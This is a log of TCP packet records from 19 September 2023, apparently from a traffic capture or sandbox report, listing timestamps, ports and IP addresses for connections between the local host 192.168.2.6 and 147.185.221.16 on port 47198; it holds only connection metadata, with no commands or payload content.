Sep 19, 2023 21:07:51.520415068 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.520526886 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.566390038 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.566478014 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.566538095 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.566597939 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.866152048 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.866358042 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.866489887 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.866549969 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.866740942 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.866794109 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.869189024 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.869244099 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.880386114 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.880429983 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.880526066 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.880557060 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.880652905 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.880690098 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.880690098 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.880690098 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.880736113 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.880791903 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.884578943 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.884666920 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.884926081 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.884975910 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.885190010 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.885247946 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.885359049 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.885413885 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.891938925 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.892004967 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:51.924575090 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:51.924679041 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.221470118 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.221483946 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.221684933 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.222255945 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.222311974 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.222585917 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.222637892 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.223551035 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.223563910 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.223618984 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.223629951 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.223675966 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.223968029 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.224019051 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.233223915 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.233309031 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.233602047 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.233649969 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.233659029 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.233707905 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.234071016 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.234122038 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.234179020 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.234236002 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.234483004 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.234532118 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.235081911 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.235132933 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.235266924 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.235308886 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.235322952 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.235361099 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.235366106 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.235378981 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.235419989 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.235440016 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.235752106 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.235790968 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.235802889 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.235836983 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.236294031 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.236354113 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.236604929 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.236668110 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.236727953 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.236740112 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.236780882 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.236794949 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.236866951 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.236913919 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.237550974 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.237607002 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.237819910 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.237870932 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.238032103 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.238085985 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.238261938 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.238312960 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:52.238648891 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.238992929 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.239382029 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.240000010 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.240442038 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.240748882 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.240911961 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.241302013 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.241545916 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.241615057 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.241843939 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.245086908 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.278310061 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.281219006 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.281254053 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.282408953 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.574567080 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.580219984 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:52.600521088 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:54.385389090 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:54.439515114 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:54.514621973 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:54.727366924 CEST	47198	49710	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:54.727530956 CEST	49710	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:54.737597942 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:54.737780094 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:54.739373922 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:55.267412901 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:55.421078920 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:55.421299934 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:55.628812075 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:55.628923893 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:55.781322002 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:55.781358004 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:55.781492949 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:55.781544924 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:55.782267094 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:55.782335997 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:55.782740116 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:55.782773018 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:55.782807112 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:55.782830000 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:55.782841921 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:55.782890081 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:55.782933950 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:55.782991886 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:55.783087969 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:55.783142090 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:55.783199072 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:55.783252001 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:55.967850924 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:55.967956066 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:56.030330896 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:56.030520916 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:56.145710945 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:56.145905972 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:56.390580893 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:56.390744925 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:56.508219957 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:56.508317947 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:56.508372068 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:56.508403063 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:56.508435965 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:56.508440018 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:56.508481979 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:56.508516073 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:56.751048088 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:56.751221895 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:56.874730110 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:56.874936104 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:56.875042915 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.111499071 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.111592054 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.111860991 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.111938000 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.112059116 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.112128973 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.234749079 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.234810114 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.234884024 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.234884024 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.234946012 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.235042095 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.235224009 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.235275030 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.235285044 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.235342026 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.235498905 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.235559940 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.235670090 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.235721111 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.236143112 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.236203909 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.236252069 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.236268044 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.236313105 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.236339092 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.236546040 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.236615896 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.236947060 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.237051010 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.237390041 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.237451077 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.237461090 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.237500906 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.237567902 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.237622023 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.237886906 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.237946033 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.237993002 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.238069057 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.238640070 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.238739967 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.239891052 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.239936113 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.239948034 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.239991903 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.241214991 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.241282940 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.242970943 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.243053913 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.281002998 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.281138897 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.472002983 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.472040892 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.472196102 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.472196102 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.472507000 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.472611904 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.472733974 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.472795010 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.472820997 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.472924948 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.472958088 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.472991943 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.473021984 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.473453045 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.473596096 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.594933033 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.595053911 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.595202923 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.595276117 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.595380068 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.595453978 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.595511913 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.595568895 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.595839977 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.595873117 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.595891953 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.595906973 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.595927954 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.595978022 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.596137047 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.596194983 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.596402884 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.596467018 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.596514940 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.596569061 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.596683979 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.596750975 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.596993923 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.597044945 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.597415924 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.597477913 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.597806931 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.597840071 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.597881079 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.597901106 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.597912073 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.597965002 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.597985983 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.598045111 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.598383904 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.598452091 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.598458052 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.598505020 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.599124908 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.599191904 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.599203110 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.599236012 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.599260092 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.599281073 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.599386930 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.599448919 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.599930048 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.599962950 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.600018978 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.600076914 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.600131989 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.600151062 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.600204945 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.600341082 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.600402117 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.600414038 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.600466013 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.600608110 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.600661993 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.600861073 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.600922108 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.600936890 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.600969076 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.601020098 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.601097107 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.601850033 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.601885080 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.601912022 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.602231026 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.602264881 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.602283001 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.602283001 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.602318048 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.602369070 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.602421045 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.607795000 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.607904911 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.641004086 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.641093016 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.831820965 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.831897020 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.832689047 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.832724094 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.832756042 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.832756996 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.832782030 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.832812071 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.833400011 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.833453894 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.833647966 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.833679914 CEST	47198	49714	147.185.221.16	192.168.2.6
Sep 19, 2023 21:07:57.833703041 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.833734035 CEST	49714	47198	192.168.2.6	147.185.221.16
Sep 19, 2023 21:07:57.833909988 CEST	47198	49714	147.185.221.16	192.168.2.6
